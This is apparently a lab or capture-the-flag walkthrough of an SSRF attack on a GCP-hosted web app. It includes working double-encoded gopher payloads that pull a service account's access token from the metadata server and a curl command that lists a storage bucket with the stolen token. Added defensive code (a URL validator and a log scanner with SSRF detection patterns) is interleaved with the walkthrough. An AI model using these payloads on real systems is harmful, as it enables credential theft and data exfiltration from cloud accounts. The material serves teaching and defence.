Exploit SSRF with Gopher for GCP Initial Access
Target IP Address: 35.226.245.121
ENUMERATION
From the initial port scan, ports 22 (SSH) and 80 (HTTP) are open, while ports 1433, 3389, and 5432 are closed.
After viewing the landing page and moving on to the shop page, inspecting the elements reveals that the site uses a Google Cloud Storage bucket. On the profile.php page, we can test for a Server-Side Request Forgery (SSRF) vulnerability.
EXPLOITATION
Using the file:///etc/passwd payload, we are able to view the local /etc/passwd file, proving that the application is vulnerable to SSRF.
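The weakness shown above is that profile.php fetches whatever URL it is given, including file:// and gopher:// targets. As an added example (not code from the write-up), the validator below shows the check such a fetch feature should run before making the request: only http/https, no hostnames that belong to the metadata service, and no destination that resolves to a loopback, private or link-local address (169.254.169.254, where the GCP metadata server lives, is link-local). The function name validate_outbound_url, the resolver hook and the sample hostnames are all assumptions made for the example.

```python
import ipaddress
import socket
from typing import Callable, List, Tuple
from urllib.parse import urlsplit

# Only plain web fetches are allowed; file://, gopher://, dict:// etc. are rejected
# by scheme alone, before any network activity happens.
ALLOWED_SCHEMES = {"http", "https"}

# Hostnames that an application should never fetch on a user's behalf.
BLOCKED_HOSTS = {"metadata.google.internal", "metadata", "localhost"}


def default_resolver(host: str) -> List[str]:
    """Resolve a hostname to all of its IPv4 addresses using the stdlib."""
    return socket.gethostbyname_ex(host)[2]


def is_forbidden_ip(ip: str) -> bool:
    """True for loopback, RFC 1918, link-local (169.254.0.0/16) and other
    non-public ranges; a fetch to any of these is treated as SSRF."""
    addr = ipaddress.ip_address(ip)
    return (addr.is_private or addr.is_loopback or addr.is_link_local
            or addr.is_reserved or addr.is_multicast or addr.is_unspecified)


def validate_outbound_url(
    url: str,
    resolver: Callable[[str], List[str]] = default_resolver,
) -> Tuple[bool, str]:
    """Return (allowed, reason). The resolver is injectable so the check can be
    unit-tested without DNS; in production the resolved IP should also be the
    one actually connected to, so a later DNS answer cannot change the target."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme '{parts.scheme}' not allowed"

    host = parts.hostname
    if not host:
        return False, "missing host"
    if host.lower().rstrip(".") in BLOCKED_HOSTS:
        return False, f"host '{host}' is blocked"

    # A literal IP needs no lookup; a name is resolved and every answer checked.
    try:
        ips = [str(ipaddress.ip_address(host))]
    except ValueError:
        try:
            ips = resolver(host)
        except OSError:
            return False, f"cannot resolve '{host}'"
    if not ips:
        return False, f"'{host}' has no addresses"

    for ip in ips:
        if is_forbidden_ip(ip):
            return False, f"'{host}' resolves to non-public address {ip}"
    return True, "ok"


if __name__ == "__main__":
    for candidate in ("file:///etc/passwd",
                      "gopher://metadata.google.internal:80/x",
                      "http://169.254.169.254/computeMetadata/v1/"):
        print(candidate, "->", validate_outbound_url(candidate))
```

Rejecting by scheme first is what stops the file:// and gopher:// payloads; the address check is what stops the same request rewritten as http://169.254.169.254/ or via a hostname the attacker controls that resolves into 169.254.0.0/16.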
To pivot into the cloud environment, we will gather information about the VM metadata. First, we query for the associated service account using the following Gopher payload:
gopher://metadata.google.internal:80/xGET%2520/computeMetadata/v1/instance/service-accounts/%2520HTTP%252f%2531%252e%2531%250AHost:%2520metadata.google.internal%250AAccept:%2520%252a%252f%252a%250aMetadata-Flavor:%2520Google%250d%250a
The query reveals the service account name:
bucketviewer@gr-proj-1.iam.gserviceaccount.com
Next, we use another Gopher payload to retrieve the service account's access token:
gopher://metadata.google.internal:80/xGET%2520/computeMetadata/v1/instance/service-accounts/bucketviewer@gr-proj-1.iam.gserviceaccount.com/token%2520HTTP%252f%2531%252e%2531%250AHost:%2520metadata.google.internal%250AAccept:%2520%252a%252f%252a%250aMetadata-Flavor:%2520Google%250d%250a
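The two payloads above are what this attack looks like from the web server's side: a profile.php request whose url parameter carries a gopher:// target, the metadata hostname, a /computeMetadata/v1/ path and a smuggled Metadata-Flavor header, all double URL-encoded (%2520 for a space, %250A for a newline). As an added example, not part of the write-up, the scanner below reads access log lines, decodes each query parameter repeatedly until it stops changing, and flags those indicators. The log lines are constructed for the example, and the function names and the combined-log regex are assumptions.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Apache/nginx combined log prefix: client, identd, user, [timestamp], "METHOD URI PROTO" status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+) \S+" (?P<status>\d{3})'
)

# Each indicator is checked against the fully decoded parameter value.
INDICATORS = (
    ("non-http scheme", re.compile(r"^(gopher|file|dict|ftp)://", re.I)),
    ("metadata hostname", re.compile(r"metadata\.google\.internal|169\.254\.169\.254", re.I)),
    ("metadata path", re.compile(r"/computeMetadata/v1/", re.I)),
    ("metadata header", re.compile(r"Metadata-Flavor", re.I)),
)

# Constructed sample: one benign fetch, then the file://, gopher:// and plain-http
# variants of the metadata probe. Client IPs are documentation ranges.
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Mar/2024:10:14:02 +0000] "GET /profile.php?url=https%3A%2F%2Fcdn.example.com%2Favatar.png HTTP/1.1" 200 512',
    '198.51.100.9 - - [12/Mar/2024:10:15:40 +0000] "GET /profile.php?url=file%3A%2F%2F%2Fetc%2Fpasswd HTTP/1.1" 200 2048',
    '198.51.100.9 - - [12/Mar/2024:10:16:03 +0000] "GET /profile.php?url=gopher%3A%2F%2Fmetadata.google.internal%3A80%2FxGET%2520%2FcomputeMetadata%2Fv1%2Finstance%2Fservice-accounts%2F%2520HTTP%252f%2531%252e%2531%250AHost%3A%2520metadata.google.internal%250AMetadata-Flavor%3A%2520Google%250d%250a HTTP/1.1" 200 96',
    '198.51.100.9 - - [12/Mar/2024:10:16:30 +0000] "GET /profile.php?url=http%3A%2F%2F169.254.169.254%2FcomputeMetadata%2Fv1%2F HTTP/1.1" 403 0',
]


def fully_decode(value: str, max_rounds: int = 3) -> str:
    """Undo nested percent-encoding (%2520 -> %20 -> ' ') up to max_rounds times."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def inspect_request(uri: str) -> list:
    """Return (parameter, indicator) pairs found in one request URI's query string."""
    hits = []
    query = urlsplit(uri).query
    for name, values in parse_qs(query, keep_blank_values=True).items():
        for value in values:
            decoded = fully_decode(value)
            for label, pattern in INDICATORS:
                if pattern.search(decoded):
                    hits.append((name, label))
    return hits


def scan_log(lines) -> list:
    """Return one alert dict per log line whose query carries SSRF indicators."""
    alerts = []
    for line in lines:
        match = LOG_RE.match(line)
        if not match:
            continue
        hits = inspect_request(match["uri"])
        if hits:
            alerts.append({
                "ip": match["ip"],
                "ts": match["ts"],
                "status": int(match["status"]),
                "uri": match["uri"],
                "indicators": sorted({label for _, label in hits}),
            })
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert["ts"], alert["ip"], alert["status"], alert["indicators"])
```

The repeated decoding matters: matching only on the raw log line would miss the gopher payload, because metadata.google.internal is visible but the smuggled header and path only appear after the second decode. A 200 response paired with the metadata indicators is the case to escalate, since it means the metadata server answered through the application.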
To use the credentials, we export the token as an environment variable:
export ACCESS_TOKEN=<token>
DATA EXFILTRATION
Now that we have the credentials, we can query the bucket using the Google Storage API:
curl "https://www.googleapis.com/storage/v1/b/gigantic-retail/o" -H "Authorization: Bearer $ACCESS_TOKEN"
The result reveals a path to a flag. Finally, we can download the flag file via curl using the -o flag: